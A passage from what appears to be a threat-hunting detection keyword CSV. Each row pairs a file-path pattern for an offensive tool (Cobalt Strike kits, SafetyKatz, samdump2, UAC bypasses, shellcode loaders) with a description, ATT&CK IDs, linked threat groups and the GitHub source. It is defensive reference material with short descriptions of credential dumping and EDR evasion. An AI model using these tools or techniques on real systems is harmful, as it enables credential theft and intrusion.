- APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nettitude/RunOF,1,1,N/A,10,10,129,22,2023-01-06T15:30:05Z,2022-02-21T13:53:39Z -*/runshellcode.*,offensive_tool_keyword,cobaltstrike,CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. thereby extending the functionality of Cobalt Strike.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CrossC2/CrossC2Kit,1,1,N/A,10,10,155,25,2023-08-08T19:52:07Z,2022-06-06T07:00:10Z -*/RuralBishop.git*,offensive_tool_keyword,RuralBishop,creates a local RW section in UrbanBishop and then maps that section as RX into a remote process,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.002 - T1070.004,TA0005 - TA0003 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/RuralBishop,1,1,N/A,10,2,101,28,2020-07-19T18:47:44Z,2020-07-19T18:47:38Z -*/rusers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/rusthound.exe*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,1,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*/RustHound.git*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,1,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -*/rvrsh3ll/*,offensive_tool_keyword,TokenTactics,Azure JWT Token Manipulation Toolset,T1134.002 - T1078.004 - T1095,TA0005 - TA0006 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/rvrsh3ll/TokenTactics,1,1,N/A,N/A,5,439,67,2023-09-26T18:45:16Z,2021-07-08T02:28:12Z -*/RWXfinder.git*,offensive_tool_keyword,rwxfinder,The program uses the Windows API functions to traverse through directories and locate DLL files with RWX section,T1059.001 - T1059.003 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Discovery,https://github.com/pwnsauc3/RWXFinder,1,1,N/A,5,1,89,12,2023-07-15T15:42:55Z,2023-07-14T07:47:21Z -*/S3cur3Th1sSh1t/*,offensive_tool_keyword,cobaltstrike,C# binary with embeded golang hack-browser-data,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/S3cur3Th1sSh1t/Sharp-HackBrowserData,1,1,N/A,10,10,84,15,2021-12-09T18:58:27Z,2020-12-06T12:28:47Z -*/S3Scanner.git*,offensive_tool_keyword,S3Scanner,Scan for open S3 buckets and dump the contents,T1583 - T1583.002 - T1114 - T1114.002,TA0010,N/A,N/A,Reconnaissance,https://github.com/sa7mon/S3Scanner,1,1,N/A,8,10,2221,366,2023-10-02T13:25:28Z,2017-06-19T22:14:21Z -*/s4n7h0/NSE*,greyware_tool_keyword,nmap,Install and update external NSE script for nmap,T1046 - T1059.001 - T1027.002,TA0007 - TA0005,N/A,N/A,Vulnerability Scanner,https://github.com/shadawck/nse-install,1,0,N/A,7,1,3,1,2020-08-28T11:27:08Z,2020-08-24T16:55:55Z -*/S4UTomato.git*,offensive_tool_keyword,S4UTomato,Escalate Service Account To LocalSystem via Kerberos,T1558 - T1558.002 - T1548.002 - T1078 - T1078.004,TA0006 - TA0004 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/wh0amitz/S4UTomato,1,1,N/A,10,4,315,58,2023-09-14T08:53:19Z,2023-07-30T11:51:57Z -*/s7-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/saefko.profile*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/Safer_PoC_CVE*,offensive_tool_keyword,POC,A Safer PoC for CVE-2022-22965 (Spring4Shell),T1550 - T1555 - T1212 - T1558,TA0001 - TA0004 - TA0006,N/A,N/A,Exploitation tools,https://github.com/colincowie/Safer_PoC_CVE-2022-22965,1,1,N/A,N/A,1,45,7,2022-05-27T12:56:40Z,2022-03-31T16:58:56Z -*/SafetyKatz.git*,offensive_tool_keyword,SafetyKatz,SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete,T1003 - T1055 - T1059 - T1574,TA0002 - TA0003 - TA0008,N/A,N/A,Credential Access,https://github.com/GhostPack/SafetyKatz,1,1,N/A,10,10,1101,244,2019-10-01T16:47:21Z,2018-07-24T17:44:15Z -*/sam_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/samba-vuln-cve-2012-1182.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/samdump.go*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*/samdump2*,offensive_tool_keyword,samdump2,Retrieves syskey and extract hashes from Windows 2k/NT/XP/Vista SAM.,T1003.002 - T1564.001,TA0006 - TA0010,N/A,N/A,Credential Access,https://salsa.debian.org/pkg-security-team/samdump2,1,0,N/A,10,6,N/A,N/A,N/A,N/A -*/samruser.py*,offensive_tool_keyword,crackmapexec,protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/sap_default.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/sc_inject/inject/*,offensive_tool_keyword,acheron,indirect syscalls for AV/EDR evasion in Go assembly,T1055.012 - T1059.001 - T1059.003,TA0005 - TA0002 - TA0003,N/A,N/A,Defense Evasion,https://github.com/f1zm0/acheron,1,1,N/A,N/A,3,244,31,2023-06-13T19:20:33Z,2023-04-07T10:40:33Z -*/scan4all.git*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/scan4all/lib/api*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/scan4all/lib/util*,offensive_tool_keyword,scan4all,Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty,T1046 - T1210.001 - T1059 - T1082 - T1110,TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011,N/A,N/A,Exploitation tools,https://github.com/hktalent/scan4all,1,1,N/A,10,10,4019,483,2023-09-30T05:33:44Z,2022-06-20T03:11:08Z -*/scanner/discovery*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scanner/kerberos*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scanner/pcanywhere*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scanner/portscan*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scanner/winrm*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/scannerPort.go*,offensive_tool_keyword,GONET-Scanner,port scanner and arp discover in go,T1595,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/luijait/GONET-Scanner,1,1,N/A,N/A,1,72,18,2022-03-10T04:35:58Z,2022-02-02T19:39:09Z -*/Scans/servers_all_smb*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/ScareCrow -I *,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,0,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*/sccmhunter*,offensive_tool_keyword,sccmhunter,SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain,T1087 - T1046 - T1484,TA0003 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/garrettfoster13/sccmhunter,1,1,N/A,9,4,344,38,2023-08-25T06:17:23Z,2023-02-20T14:09:42Z -*/schtasksenum/*.*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/scmuacbypass.cpp*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*/scmuacbypass.exe*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*/SCMUACBypass.git*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*/SCMUACBypass/*,offensive_tool_keyword,SCMUACBypass,SCM UAC Bypass,T1548.002 - T1088,TA0004 - TA0002,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/SCMUACBypass,1,1,N/A,8,1,57,9,2023-09-05T17:24:49Z,2023-09-04T13:11:17Z -*/ScreenshotInject*,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,1,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*/scripts/xor.py*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,1,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*/ScriptSentry.git*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*/ScriptSentry.ps1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*/ScriptSentry.psd1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*/ScriptSentry.psm1*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*/ScRunHex.py*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*/scshell*,offensive_tool_keyword,scshell,SCShell is a fileless lateral movement tool that relies on ChangeServiceConfigA to run commands. The beauty of this tool is that it does not perform authentication against SMB. Everything is performed over DCERPC.The utility can be used remotely WITHOUT registering a service or creating a service. It also doesn't have to drop any file on the remote system* (Depend on the technique used to execute),T1071.001 - T1071.004 - T1046 - T1059 - T1024,TA0002 - TA0003 - TA0007,N/A,N/A,POST Exploitation tools,https://github.com/Mr-Un1k0d3r/SCShell,1,0,N/A,N/A,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*/scshell.py*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*/searchsploit*,offensive_tool_keyword,cobaltstrike,Rapid Attack Infrastructure (RAI),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/obscuritylabs/RAI,1,1,N/A,10,10,283,53,2021-10-06T17:44:19Z,2018-02-12T16:23:23Z -*/Seatbelt.txt*,offensive_tool_keyword,cobaltstrike,Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass 